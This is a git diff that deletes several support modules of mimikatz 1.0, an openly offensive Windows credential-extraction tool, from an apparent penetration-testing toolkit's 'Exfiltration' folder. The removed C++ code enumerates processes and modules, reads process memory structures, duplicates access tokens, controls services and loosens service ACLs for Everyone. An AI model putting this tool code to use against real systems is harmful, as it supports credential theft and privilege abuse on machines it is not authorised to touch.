\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/modules/mod_process.h b/Exfiltration/mimikatz-1.0/modules/mod_process.h deleted file mode 100644 index a7acf18..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_process.h +++ /dev/null @@ -1,84 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "secpkg.h" -#include "mod_ntddk.h" -#include "mod_memory.h" -#include "mod_text.h" -#include <security.h> -#include <tlhelp32.h> - -class mod_process -{ -public: - typedef struct _KIWI_IAT_MODULE - { - PVOID ptrToFunc; - PVOID ptrFunc; - WORD Ordinal; - string funcName; - } KIWI_IAT_MODULE, *PKIWI_IAT_MODULE; - - typedef struct _KIWI_PROCESSENTRY32 - { - DWORD dwSize; - DWORD cntUsage; - DWORD th32ProcessID; // this process - ULONG_PTR th32DefaultHeapID; - DWORD th32ModuleID; // associated exe - DWORD cntThreads; - DWORD th32ParentProcessID; // this process's parent process - LONG pcPriClassBase; // Base priority of process's threads - DWORD dwFlags; - wstring szExeFile; // Path - } KIWI_PROCESSENTRY32, *PKIWI_PROCESSENTRY32; - - typedef struct _KIWI_MODULEENTRY32 - { - DWORD dwSize; - DWORD th32ModuleID; // This module - DWORD th32ProcessID; // owning process - DWORD GlblcntUsage; // Global usage count on the module - DWORD ProccntUsage; // Module usage count in th32ProcessID's context - BYTE * modBaseAddr; // Base address of module in th32ProcessID's context - DWORD modBaseSize; // Size in bytes of module starting at modBaseAddr - HMODULE hModule; // The hModule of this module in th32ProcessID's context - wstring szModule; - wstring szExePath; - } KIWI_MODULEENTRY32, *PKIWI_MODULEENTRY32; - - typedef struct _KIWI_VERY_BASIC_MODULEENTRY - { - BYTE * modBaseAddr; // Base address of module in th32ProcessID's context - DWORD modBaseSize; // Size in bytes of module starting at modBaseAddr - wstring szModule; - } KIWI_VERY_BASIC_MODULEENTRY, *PKIWI_VERY_BASIC_MODULEENTRY; - - static bool getList(vector<KIWI_PROCESSENTRY32> * maProcessesvector, wstring * processName = NULL); - static bool getUniqueForName(KIWI_PROCESSENTRY32 * monProcess, wstring * processName); - - static bool start(wstring * maCommandLine, PROCESS_INFORMATION * mesInfosProcess, bool paused = false, bool aUsurper = false, HANDLE leToken = NULL); - static bool suspend(DWORD & processId); - static bool resume(DWORD & processId); - static bool stop(DWORD & processId, DWORD exitCode = 0); - - static bool debug(DWORD & processId); - - static bool getAuthentificationIdFromProcessId(DWORD & processId, LUID & AuthentificationId); - static bool getModulesListForProcessId(vector<KIWI_MODULEENTRY32> * maModulevector, DWORD * processId = NULL); - static bool getVeryBasicModulesListForProcess(vector<KIWI_VERY_BASIC_MODULEENTRY> * monModuleVector, HANDLE processHandle = INVALID_HANDLE_VALUE); - static bool getUniqueModuleForName(KIWI_MODULEENTRY32 * monModule, wstring * moduleName = NULL, DWORD * processId = NULL); - - static bool getProcessEntryFromProcessId(DWORD processId, KIWI_PROCESSENTRY32 * processKiwi, vector<mod_process::KIWI_PROCESSENTRY32> * mesProcess = NULL); - - static bool getProcessBasicInformation(PROCESS_BASIC_INFORMATION * mesInfos, HANDLE processHandle = INVALID_HANDLE_VALUE); - static bool getPeb(PEB * peb, HANDLE processHandle = INVALID_HANDLE_VALUE); - static bool getIAT(PBYTE ptrBaseAddr, vector<pair<string, vector<KIWI_IAT_MODULE>>> * monIAT, HANDLE handleProcess = INVALID_HANDLE_VALUE); - - static wstring getUnicodeStringOfProcess(UNICODE_STRING * ptrString, HANDLE process = INVALID_HANDLE_VALUE, PLSA_PROTECT_MEMORY unProtectFunction = NULL); - static bool getUnicodeStringOfProcess(UNICODE_STRING * ptrString, BYTE ** monBuffer, HANDLE process, PLSA_PROTECT_MEMORY unProtectFunction = NULL); -}; diff --git a/Exfiltration/mimikatz-1.0/modules/mod_secacl.cpp b/Exfiltration/mimikatz-1.0/modules/mod_secacl.cpp deleted file mode 100644 index c14632c..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_secacl.cpp +++ /dev/null @@ -1,162 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_secacl.h" - -bool mod_secacl::nullSdToHandle(PHANDLE monHandle, SE_OBJECT_TYPE monType) -{ - PSECURITY_DESCRIPTOR newSD = NULL; - ULONG laTaille; - bool succes = false; - - if(BuildSecurityDescriptor(NULL, NULL, 0, NULL, 0, NULL, NULL, &laTaille, &newSD) == ERROR_SUCCESS) - { - switch(monType) - { - case SE_KERNEL_OBJECT: - succes = SetKernelObjectSecurity(*monHandle, DACL_SECURITY_INFORMATION, newSD) != 0; - break; - case SE_SERVICE: - succes = SetServiceObjectSecurity(*reinterpret_cast<SC_HANDLE *>(monHandle), DACL_SECURITY_INFORMATION, newSD) != 0; - break; - } - LocalFree(newSD); - } - - return succes; -} - -bool mod_secacl::addWorldToMimikatz(SC_HANDLE * monHandle) -{ - bool reussite = false; - DWORD dwSizeNeeded = 0; - SECURITY_DESCRIPTOR monSd; - if((QueryServiceObjectSecurity(*monHandle, DACL_SECURITY_INFORMATION, &monSd, 0, &dwSizeNeeded) == 0) && (GetLastError() == ERROR_INSUFFICIENT_BUFFER)) - { - PSECURITY_DESCRIPTOR oldSd = new BYTE[dwSizeNeeded]; - if(QueryServiceObjectSecurity(*monHandle, DACL_SECURITY_INFORMATION, oldSd, dwSizeNeeded, &dwSizeNeeded)) - { - SID_IDENTIFIER_AUTHORITY SIDAuthWorld = SECURITY_WORLD_SID_AUTHORITY; - PSID pEveryoneSID = NULL; - if(AllocateAndInitializeSid(&SIDAuthWorld, 1, SECURITY_WORLD_RID, 0, 0, 0, 0, 0, 0, 0, &pEveryoneSID)) - { - EXPLICIT_ACCESS ForEveryOne; - RtlZeroMemory(&ForEveryOne, sizeof(EXPLICIT_ACCESS)); - ForEveryOne.grfAccessMode = SET_ACCESS; - ForEveryOne.grfInheritance = NO_INHERITANCE; - ForEveryOne.grfAccessPermissions = SERVICE_QUERY_STATUS | SERVICE_QUERY_CONFIG | SERVICE_INTERROGATE | SERVICE_ENUMERATE_DEPENDENTS | SERVICE_PAUSE_CONTINUE | SERVICE_START | SERVICE_STOP | SERVICE_USER_DEFINED_CONTROL | READ_CONTROL ; - ForEveryOne.Trustee.TrusteeForm = TRUSTEE_IS_SID; - ForEveryOne.Trustee.TrusteeType = TRUSTEE_IS_WELL_KNOWN_GROUP; - ForEveryOne.Trustee.ptstrName = reinterpret_cast<LPTSTR>(pEveryoneSID); - - PSECURITY_DESCRIPTOR newSd = NULL; - DWORD laTaille; - if(BuildSecurityDescriptor(NULL, NULL, 1, &ForEveryOne, 0, NULL, oldSd, &laTaille, &newSd) == ERROR_SUCCESS) - { - reussite = SetServiceObjectSecurity(*monHandle, DACL_SECURITY_INFORMATION, newSd) != 0; - LocalFree(newSd); - } - FreeSid(pEveryoneSID); - } - } - delete [] oldSd; - } - return reussite; -} - -bool mod_secacl::sidToStrSid(PSID Sid, wstring * strSid) -{ - bool reussite = false; - - wchar_t * szSid; - if(reussite = ConvertSidToStringSid(Sid, &szSid) != 0) - { - strSid->assign(szSid); - LocalFree(szSid); - } - return reussite; -} - -bool mod_secacl::sidToName(PSID Sid, wstring * strName, wstring * domainName, wstring * systemName, SID_NAME_USE * usage) -{ - bool reussite = false; - - DWORD dwSizeName = 0; - DWORD dwSizeDomain = 0; - SID_NAME_USE nameUse; - - if(!LookupAccountSid((systemName ? systemName->c_str() : NULL), Sid, NULL, &dwSizeName, NULL, &dwSizeDomain, &nameUse) && (GetLastError() == ERROR_INSUFFICIENT_BUFFER)) - { - wchar_t * monNom = new wchar_t[dwSizeName]; - wchar_t * monDomain = new wchar_t[dwSizeDomain]; - if(reussite = (LookupAccountSid((systemName ? systemName->c_str() : NULL), Sid, monNom, &dwSizeName, monDomain, &dwSizeDomain, &nameUse)) != 0) - { - strName->assign(monNom); - if(domainName) - domainName->assign(monDomain); - - if(usage) - *usage = nameUse; - } - delete[] monDomain; - delete[] monNom; - } - - return reussite; -} - -bool mod_secacl::simpleSidToString(PSID Sid, wstring * String) -{ - wstring userName; - wstring domaineName; - String->clear(); - - if(Sid) - { - if(mod_secacl::sidToName(Sid, &userName, &domaineName)) - { - String->assign(domaineName); - String->push_back(L'\\'); - String->append(userName); - } - else - mod_secacl::sidToStrSid(Sid, String); - } - if(String->empty()) - String->assign(L"(null)"); - - return true; -} - -bool mod_secacl::tokenUser(HANDLE tokenHandle, wstring * strName, wstring * domainName, wstring * systemName, SID_NAME_USE * usage) -{ - bool reussite = false; - - DWORD szNeeded = 0; - if(!GetTokenInformation(tokenHandle, TokenUser, NULL, 0, &szNeeded) && (GetLastError() == ERROR_INSUFFICIENT_BUFFER)) - { - BYTE * mesDonnees = new BYTE[szNeeded]; - if(GetTokenInformation(tokenHandle, TokenUser, mesDonnees, szNeeded, &szNeeded)) - { - TOKEN_USER * monUser = reinterpret_cast<TOKEN_USER *>(mesDonnees); - reussite = sidToName(monUser->User.Sid, strName, domainName, systemName, usage); - } - delete[] mesDonnees; - } - - return reussite; -} - -bool mod_secacl::exchangeDupToken(HANDLE * tokenHandle) -{ - bool reussite = false; - HANDLE secToken; - if(reussite = DuplicateTokenEx(*tokenHandle, MAXIMUM_ALLOWED, NULL, /*SecurityImpersonation*/SecurityDelegation, /*TokenImpersonation*/ TokenPrimary, &secToken) != 0) - { - CloseHandle(*tokenHandle); - *tokenHandle = secToken; - } - return reussite; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/modules/mod_secacl.h b/Exfiltration/mimikatz-1.0/modules/mod_secacl.h deleted file mode 100644 index 5e8aa04..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_secacl.h +++ /dev/null @@ -1,24 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include <aclapi.h> -#include <sddl.h> - -using namespace std; - -class mod_secacl -{ -public: - static bool simpleSidToString(PSID Sid, wstring * String); - static bool sidToStrSid(PSID Sid, wstring * strSid); - static bool nullSdToHandle(PHANDLE monHandle, SE_OBJECT_TYPE monType = SE_KERNEL_OBJECT); - static bool sidToName(PSID Sid, wstring * strName, wstring * domainName = NULL, wstring * systemName = NULL, SID_NAME_USE * usage = NULL); - static bool tokenUser(HANDLE tokenHandle, wstring * strName, wstring * domainName = NULL, wstring * systemName = NULL, SID_NAME_USE * usage = NULL); - - static bool exchangeDupToken(HANDLE * tokenHandle); - static bool addWorldToMimikatz(SC_HANDLE * monHandle); -}; diff --git a/Exfiltration/mimikatz-1.0/modules/mod_service.cpp b/Exfiltration/mimikatz-1.0/modules/mod_service.cpp deleted file mode 100644 index c234481..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_service.cpp +++ /dev/null @@ -1,142 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_service.h" - -bool mod_service::getList(vector<KIWI_SERVICE_STATUS_PROCESS> * monVectorService, wstring * machineName) // machine non implment -{ - bool reussite = false; - DWORD error = ERROR_SUCCESS; - - if(SC_HANDLE monManager = OpenSCManager(machineName ? machineName->c_str() : NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_CONNECT | SC_MANAGER_ENUMERATE_SERVICE)) - { - DWORD tailleRequise = 0; - DWORD nbServices = 0; - DWORD resumeHandle = 0; - - if(!(EnumServicesStatusEx(monManager, SC_ENUM_PROCESS_INFO, SERVICE_DRIVER | SERVICE_WIN32, SERVICE_STATE_ALL, NULL, 0, &tailleRequise, &nbServices, &resumeHandle, NULL) != 0) && GetLastError() == ERROR_MORE_DATA) - { - BYTE * servicesBuff = new BYTE[tailleRequise]; - ENUM_SERVICE_STATUS_PROCESS * mesServ = reinterpret_cast<ENUM_SERVICE_STATUS_PROCESS *>(servicesBuff); - if(reussite = EnumServicesStatusEx(monManager, SC_ENUM_PROCESS_INFO, SERVICE_DRIVER | SERVICE_WIN32, SERVICE_STATE_ALL, servicesBuff, tailleRequise, &tailleRequise, &nbServices, &resumeHandle, NULL) != 0) - { - for(DWORD i = 0; i < nbServices; i++) - { - KIWI_SERVICE_STATUS_PROCESS monService = {mesServ[i].lpServiceName, mesServ[i].lpDisplayName, mesServ[i].ServiceStatusProcess}; - monVectorService->push_back(monService); - } - } - delete[] servicesBuff; - error = GetLastError(); - } - - CloseServiceHandle(monManager); - SetLastError(error); - } - return reussite; -} - - -bool mod_service::getUniqueForName(KIWI_SERVICE_STATUS_PROCESS * monService, wstring * serviceName, wstring * machineName) // machine non implment -{ - bool reussite = false; - - vector<KIWI_SERVICE_STATUS_PROCESS> * vectorServices = new vector<KIWI_SERVICE_STATUS_PROCESS>(); - if(getList(vectorServices, machineName)) - { - for(vector<KIWI_SERVICE_STATUS_PROCESS>::iterator monSvc = vectorServices->begin(); monSvc != vectorServices->end(); monSvc++) - { - if(reussite = (_wcsicmp(monSvc->serviceName.c_str(), serviceName->c_str()) == 0)) - { - *monService = *monSvc; - break; - } - } - } - delete vectorServices; - - return reussite; -} - -bool mod_service::start(wstring * serviceName, wstring * machineName) -{ - bool reussite = false; - DWORD error = ERROR_SUCCESS; - if(SC_HANDLE monManager = OpenSCManager(machineName ? machineName->c_str() : NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_CONNECT)) - { - if(SC_HANDLE monService = OpenService(monManager, serviceName->c_str(), SERVICE_START)) - { - if(!(reussite = StartService(monService, 0, NULL) != 0)) - error = GetLastError(); - CloseServiceHandle(monService); - } - else - error = GetLastError(); - CloseServiceHandle(monManager); - SetLastError(error); - } - - return reussite; -} - -bool mod_service::remove(wstring * serviceName, wstring * machineName) -{ - bool reussite = false; - DWORD error = ERROR_SUCCESS; - if(SC_HANDLE monManager = OpenSCManager(machineName ? machineName->c_str() : NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_CONNECT)) - { - if(SC_HANDLE monService = OpenService(monManager, serviceName->c_str(), DELETE)) - { - if(!(reussite = DeleteService(monService) != 0)) - error = GetLastError(); - CloseServiceHandle(monService); - } - else - error = GetLastError(); - CloseServiceHandle(monManager); - SetLastError(error); - } - return reussite; -} - -bool mod_service::genericControl(wstring * serviceName, DWORD dwDesiredAccess, DWORD dwControl, LPSERVICE_STATUS ptrServiceStatus, wstring * machineName) -{ - bool reussite = false; - DWORD error = ERROR_SUCCESS; - if(SC_HANDLE monManager = OpenSCManager(machineName ? machineName->c_str() : NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_CONNECT)) - { - if(SC_HANDLE monService = OpenService(monManager, serviceName->c_str(), dwDesiredAccess)) - { - if(!(reussite = ControlService(monService, dwControl, ptrServiceStatus) != 0)) - error = GetLastError(); - CloseServiceHandle(monService); - } - else - error = GetLastError(); - CloseServiceHandle(monManager); - SetLastError(error); - } - return reussite; -} - - -bool mod_service::stop(wstring * serviceName, wstring * machineName) -{ - SERVICE_STATUS serviceStatus; - return(genericControl(serviceName, SERVICE_STOP, SERVICE_CONTROL_STOP, &serviceStatus, machineName)); -} - -bool mod_service::suspend(wstring * serviceName, wstring * machineName) -{ - SERVICE_STATUS serviceStatus; - return(genericControl(serviceName, SERVICE_PAUSE_CONTINUE, SERVICE_CONTROL_PAUSE, &serviceStatus, machineName)); -} - -bool mod_service::resume(wstring * serviceName, wstring * machineName) -{ - SERVICE_STATUS serviceStatus; - return(genericControl(serviceName, SERVICE_PAUSE_CONTINUE, SERVICE_CONTROL_CONTINUE, &serviceStatus, machineName)); -} - diff --git a/Exfiltration/mimikatz-1.0/modules/mod_service.h b/Exfiltration/mimikatz-1.0/modules/mod_service.h deleted file mode 100644 index b438454..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_service.h +++ /dev/null @@ -1,38 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_secacl.h" - -class mod_service -{ -private: - static bool genericControl(wstring * serviceName, DWORD dwDesiredAccess, DWORD dwControl, LPSERVICE_STATUS ptrServiceStatus, wstring * machineName = NULL); - -public: - typedef struct _KIWI_SERVICE_STATUS_PROCESS - { - wstring serviceName; - wstring serviceDisplayName; - SERVICE_STATUS_PROCESS ServiceStatusProcess; - } KIWI_SERVICE_STATUS_PROCESS, *PKIWI_SERVICE_STATUS_PROCESS; - - static bool getList(vector<KIWI_SERVICE_STATUS_PROCESS> * monVectorService, wstring * machineName = NULL); - static bool getUniqueForName(KIWI_SERVICE_STATUS_PROCESS * monService, wstring * serviceName, wstring * machineName = NULL); - - static bool start(wstring * serviceName, wstring * machineName = NULL); - static bool suspend(wstring * serviceName, wstring * machineName = NULL); - static bool resume(wstring * serviceName, wstring * machineName = NULL); - static bool stop(wstring * serviceName, wstring * machineName = NULL); - - static bool query(wstring * serviceName, wstring * machineName = NULL); // a voir ? - - static bool add(wstring * binPath, vector<wstring> * arguments); // bla bla - static bool remove(wstring * serviceName, wstring * machineName = NULL); - static bool control(vector<wstring> * arguments); - -}; - diff --git a/Exfiltration/mimikatz-1.0/modules/mod_system.cpp b/Exfiltration/mimikatz-1.0/modules/mod_system.cpp deleted file mode 100644 index 7a79a76..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_system.cpp +++ /dev/null @@ -1,208 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_system.h" - -OSVERSIONINFOEX mod_system::GLOB_Version; - -wstring mod_system::getWinError(bool automatique, DWORD code) -{ - bool reussite = false; - DWORD dwError = (automatique ? GetLastError() : code); - wostringstream resultat; - wchar_t * monBuffer = NULL; - - resultat << L"(0x" << setw(sizeof(DWORD)*2) << setfill(wchar_t('0')) << hex << dwError << dec << L')'; - if(!(reussite = FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_MAX_WIDTH_MASK, NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), reinterpret_cast<wchar_t *>(&monBuffer), 0, NULL) != 0)) - reussite = FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_MAX_WIDTH_MASK | FORMAT_MESSAGE_FROM_HMODULE, GetModuleHandle(L"ntdll"), dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), reinterpret_cast<wchar_t *>(&monBuffer), 0, NULL) != 0; - - if(reussite) - { - resultat << L' ' << monBuffer; - LocalFree(monBuffer); - } - else resultat << L" * Impossible d\'obtenir un message *"; - - return resultat.str(); -} - -bool mod_system::getUserName(wstring * monUserName) -{ - bool reussite = false; - unsigned long tailleRequise = 0; - - if(!GetUserNameEx(NameSamCompatible, NULL, &tailleRequise) && GetLastError() == ERROR_MORE_DATA) - { - wchar_t * monBuffer = new wchar_t[tailleRequise]; - if(reussite = (GetUserNameEx(NameSamCompatible, monBuffer, &tailleRequise) != 0)) - { - monUserName->assign(monBuffer); - } - delete[] monBuffer; - } - return reussite; -} - -bool mod_system::getComputerName(wstring * monComputerName) -{ - bool reussite = false; - DWORD tailleRequise = 0; - - if(!GetComputerNameEx(ComputerNamePhysicalDnsFullyQualified , NULL, &tailleRequise) && GetLastError() == ERROR_MORE_DATA) - { - wchar_t * monBuffer = new wchar_t[tailleRequise]; - if(reussite = (GetComputerNameEx(ComputerNamePhysicalDnsFullyQualified, monBuffer, &tailleRequise) != 0)) - { - monComputerName->assign(monBuffer); - } - delete[] monBuffer; - } - return reussite; -} - -bool mod_system::getVersion(OSVERSIONINFOEX * maVersion) -{ - RtlZeroMemory(maVersion, sizeof(OSVERSIONINFOEX)); - maVersion->dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX); - return (GetVersionEx(reinterpret_cast<LPOSVERSIONINFO>(maVersion)) != 0); -} - -bool mod_system::getCurrentDirectory(wstring * monRepertoire) -{ - bool reussite = false; - DWORD tailleRequise = GetCurrentDirectory(0, NULL); - wchar_t * monBuffer = new wchar_t[tailleRequise]; - if(tailleRequise > 0 && GetCurrentDirectory(tailleRequise, monBuffer) == tailleRequise - 1) - { - monRepertoire->assign(monBuffer); - reussite = true; - } - delete monBuffer; - return reussite; -} - -bool mod_system::getAbsolutePathOf(wstring &thisData, wstring *reponse) -{ - bool reussite = false; - wchar_t monBuffer[MAX_PATH]; - - if(PathIsRelative(thisData.c_str())) - { - wstring monRep = L""; - if(reussite = getCurrentDirectory(&monRep)) - { - PathCombine(monBuffer, monRep.c_str(), thisData.c_str()); - reponse->assign(monBuffer); - } - } - else - { - if(reussite = (PathCanonicalize(monBuffer, thisData.c_str()) != 0)) - { - reponse->assign(monBuffer); - } - } - return reussite; -} - -bool mod_system::isFileExist(std::wstring &fichier, bool *resultat) -{ - bool reussite = false; - HANDLE monFichier = CreateFile(fichier.c_str(), 0, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL); - - if(reussite = (monFichier && monFichier != INVALID_HANDLE_VALUE)) - { - CloseHandle(monFichier); - *resultat = true; - } - else if(reussite = (GetLastError() == ERROR_FILE_NOT_FOUND)) - { - *resultat = false; - } - return reussite; -} - -bool mod_system::getSystemHandles(vector<SYSTEM_HANDLE> * mesHandles, DWORD * pid) -{ - bool reussite = false; - - if(PNT_QUERY_SYSTEM_INFORMATION NtQuerySystemInformation = reinterpret_cast<PNT_QUERY_SYSTEM_INFORMATION>(GetProcAddress(GetModuleHandle(L"ntdll"), "NtQuerySystemInformation"))) - { - DWORD size = 0x10000; - BYTE * monBuffer = new BYTE[size]; - ULONG sizeReturn = 0; - NTSTATUS status; - - while((status = NtQuerySystemInformation(SystemHandleInformation, monBuffer, size, &sizeReturn)) == STATUS_INFO_LENGTH_MISMATCH) - { - delete[] monBuffer; - size <<= 1; - monBuffer = new BYTE[size]; - } - - if(reussite = NT_SUCCESS(status)) - { - PSYSTEM_HANDLE_INFORMATION mesInfos = reinterpret_cast<PSYSTEM_HANDLE_INFORMATION>(monBuffer); - for(DWORD i = 0; i < mesInfos->HandleCount; i++) - { - if(!pid || *pid == mesInfos->Handles[i].ProcessId) - mesHandles->push_back(mesInfos->Handles[i]); - } - } - - delete[] monBuffer; - } - - return reussite; -} - -bool mod_system::getHandleInfo(HANDLE monHandle, PBYTE * buffer, OBJECT_INFORMATION_CLASS typeInfo) -{ - bool reussite = false; - - if(PNT_QUERY_OBJECT NtQueryObject = reinterpret_cast<PNT_QUERY_OBJECT>(GetProcAddress(GetModuleHandle(L"ntdll"), "NtQueryObject"))) - { - DWORD tailleRequise = 0; - - if(NtQueryObject(monHandle, typeInfo, NULL, 0, &tailleRequise) == STATUS_INFO_LENGTH_MISMATCH) - { - *buffer = new BYTE[tailleRequise]; - if(!(reussite = NT_SUCCESS(NtQueryObject(monHandle, typeInfo, *buffer, tailleRequise, &tailleRequise)))) - { - delete[] buffer; - } - } - } - - return reussite; -} - -bool mod_system::getHandleType(HANDLE monHandle, wstring * strType) -{ - bool reussite = false; - - BYTE * monBuffer = NULL; - if(reussite = getHandleInfo(monHandle, &monBuffer, ObjectTypeInformation)) - { - POBJECT_TYPE_INFORMATION typeInfo = reinterpret_cast<POBJECT_TYPE_INFORMATION>(monBuffer); - strType->assign(typeInfo->Name.Buffer, typeInfo->Name.Length / sizeof(wchar_t)); - delete[] monBuffer; - } - return reussite; -} - -bool mod_system::getHandleName(HANDLE monHandle, wstring * strName) -{ - bool reussite = false; - - BYTE * monBuffer = NULL; - if(reussite = getHandleInfo(monHandle, &monBuffer, ObjectNameInformation)) - { - PUNICODE_STRING typeName = reinterpret_cast<PUNICODE_STRING>(monBuffer); - strName->assign(typeName->Buffer, typeName->Length / sizeof(wchar_t)); - delete[] monBuffer; - } - return reussite; -} diff --git a/Exfiltration/mimikatz-1.0/modules/mod_system.h b/Exfiltration/mimikatz-1.0/modules/mod_system.h deleted file mode 100644 index 7f41190..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_system.h +++ /dev/null @@ -1,34 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_ntddk.h" -#include <security.h> -#include <shlwapi.h> -#include <sstream> -#include <iomanip> - -class mod_system -{ -private: - static bool getHandleInfo(HANDLE monHandle, PBYTE * buffer, OBJECT_INFORMATION_CLASS typeInfo); - -public: - static wstring getWinError(bool automatique = true, DWORD code = 0); - - static bool getUserName(wstring * monUserName); - static bool getComputerName(wstring *monComputerName); - static bool getVersion(OSVERSIONINFOEX * maVersion); - - static bool isFileExist(std::wstring &fichier, bool *resultat); - static bool getCurrentDirectory(wstring * monRepertoire); - static bool getAbsolutePathOf(wstring &thisData, wstring *reponse); - static bool getSystemHandles(vector<SYSTEM_HANDLE> * mesHandles, DWORD * pid = NULL); // type ?? - static bool getHandleType(HANDLE monHandle, wstring * strType); - static bool getHandleName(HANDLE monHandle, wstring * strName); - - static OSVERSIONINFOEX GLOB_Version; -}; diff --git a/Exfiltration/mimikatz-1.0/modules/mod_text.cpp b/Exfiltration/mimikatz-1.0/modules/mod_text.cpp deleted file mode 100644 index 98de950..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_text.cpp +++ /dev/null @@ -1,101 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_text.h" - -PRTL_INIT_STRING mod_text::RtlInitString = reinterpret_cast<PRTL_INIT_STRING>(GetProcAddress(GetModuleHandle(L"ntdll"), "RtlInitString")); -PRTL_INIT_UNICODESTRING mod_text::RtlInitUnicodeString = reinterpret_cast<PRTL_INIT_UNICODESTRING>(GetProcAddress(GetModuleHandle(L"ntdll"), "RtlInitUnicodeString")); - -wstring mod_text::stringOfHex(const BYTE monTab[], DWORD maTaille, DWORD longueur) -{ - wostringstream monStream; - for(DWORD j = 0; j < maTaille; j++) - { - monStream << setw(2) << setfill(wchar_t('0')) << hex << monTab[j]; - if(longueur != 0) - { - monStream << L' '; - if ((j + 1) % longueur == 0) - monStream << endl; - } - } - return monStream.str(); -} - -wstring mod_text::stringOrHex(const BYTE monTab[], DWORD maTaille, DWORD longueur, bool ligne) -{ - wstring result; - if(monTab && maTaille > 0) - { - int flags = IS_TEXT_UNICODE_ODD_LENGTH | IS_TEXT_UNICODE_STATISTICS /*| IS_TEXT_UNICODE_NULL_BYTES*/; - if(IsTextUnicode(monTab, maTaille, &flags)) - { - result.assign(reinterpret_cast<const wchar_t *>(monTab), maTaille / sizeof(wchar_t)); - } - else - { - if(ligne) - result.assign(L"\n"); - result.append(stringOfHex(monTab, maTaille, longueur)); - } - } - else result.assign(L"<NULL>"); - - return result; -} - -void mod_text::wstringHexToByte(wstring &maChaine, BYTE monTab[]) -{ - wstringstream z; - unsigned int temp; - for(size_t i = 0; i < maChaine.size() / 2; i++) - { - z.clear(); - z << maChaine.substr(i * 2, 2); z >> hex >> temp; - monTab[i] = temp; - } -} - -bool mod_text::wstr_ends_with(const wchar_t * str, const wchar_t * suffix) -{ - if(str && suffix) - { - size_t str_len = wcslen(str), suffix_len = wcslen(suffix); - return wstr_ends_with(str, str_len, suffix, suffix_len); - } - return false; -} - -bool mod_text::wstr_ends_with(const wchar_t * str, size_t str_len, const wchar_t * suffix, size_t suffix_len) -{ - if(str && suffix && (suffix_len <= str_len)) - return (_wcsnicmp(str + str_len - suffix_len, suffix, suffix_len) == 0); - return false; -} - -wstring mod_text::stringOfSTRING(UNICODE_STRING maString) -{ - return wstring(maString.Buffer, maString.Length / sizeof(wchar_t)); -} -string mod_text::stringOfSTRING(STRING maString) -{ - return string(maString.Buffer, maString.Length); -} - -void mod_text::InitLsaStringToBuffer(LSA_UNICODE_STRING * LsaString, wstring &maDonnee, wchar_t monBuffer[]) -{ - RtlCopyMemory(monBuffer, maDonnee.c_str(), (maDonnee.size() + 1) * sizeof(wchar_t)); - RtlInitUnicodeString(LsaString, monBuffer); -} - -LUID mod_text::wstringsToLUID(wstring &highPart, wstring &lowPart) -{ - LUID monLUID = {0, 0}; - wstringstream z; - z << highPart; z >> monLUID.HighPart; - z.clear(); - z << lowPart; z >> monLUID.LowPart; - return monLUID; -}
